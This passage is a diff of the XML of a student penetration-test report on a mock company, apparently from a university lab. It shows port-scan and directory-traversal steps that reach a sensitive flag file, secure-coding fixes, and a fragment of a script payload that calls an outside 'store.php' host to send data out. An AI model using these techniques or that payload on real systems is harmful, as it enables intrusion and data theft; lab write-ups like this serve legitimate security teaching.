+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ort</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">scan the server till </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the response changes.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BFA6951" wp14:editId="00A748C8">
+                  <wp:extent cx="2712720" cy="1213485"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+                  <wp:docPr id="14" name="Picture 14"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId29"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2712720" cy="1213485"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3872" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>documents/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>random/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/flag.txt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4488" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Traverse every directory and eventually we</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> will</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> leak out the sensitive information:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E6A05C9" wp14:editId="346CB9AD">
+                  <wp:extent cx="2712720" cy="556895"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="15" name="Picture 15"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId30"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
                             <a:ext cx="2712720" cy="556895"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
@@ -15565,8 +17912,8 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId28"/>
-      <w:footerReference w:type="first" r:id="rId29"/>
+      <w:footerReference w:type="default" r:id="rId31"/>
+      <w:footerReference w:type="first" r:id="rId32"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -72,23 +72,13 @@
           <w:szCs w:val="48"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
+        <w:t>PleaseHold Pty. Ltd.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -291,15 +281,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> at the request of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
+        <w:t xml:space="preserve"> at the request of PleaseHold Pty. Ltd.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -782,21 +764,7 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Since </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
+        <w:t xml:space="preserve"> Since PleaseHold deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6417,43 +6385,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6481,61 +6413,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6563,43 +6441,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6627,43 +6469,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7747,27 +7553,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">$question = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>htmlentities</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>($_POST["question"])</w:t>
+              <w:t>$question = htmlentities($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9557,7 +9343,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -9565,37 +9350,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>LoadModule</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ssl_module</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> modules/mod_ssl.so</w:t>
+              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9671,27 +9426,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> *:443&gt;</w:t>
+              <w:t>&lt;VirtualHost *:443&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9719,27 +9454,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ServerName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> www.example.com</w:t>
+              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9767,27 +9482,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLEngine</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> on</w:t>
+              <w:t xml:space="preserve">    SSLEngine on</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9815,27 +9510,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.cert"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9863,27 +9538,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateKeyFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.key"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9911,27 +9566,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;/VirtualHost&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10283,21 +9918,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note that the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>apikey</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> needs to be replace</w:t>
+              <w:t>Note that the apikey needs to be replace</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10332,7 +9953,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-variable"/>
@@ -10360,7 +9980,6 @@
               </w:rPr>
               <w:t>ajax</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10408,67 +10027,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>"http://assignment-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>hermes.unimelb.life</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>store.php?name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>=%%"</w:t>
+              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10572,7 +10131,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-property"/>
@@ -10582,7 +10140,6 @@
               </w:rPr>
               <w:t>apikey</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10642,17 +10199,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="message-body"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>).</w:t>
+              <w:t>}).</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10663,7 +10210,6 @@
               </w:rPr>
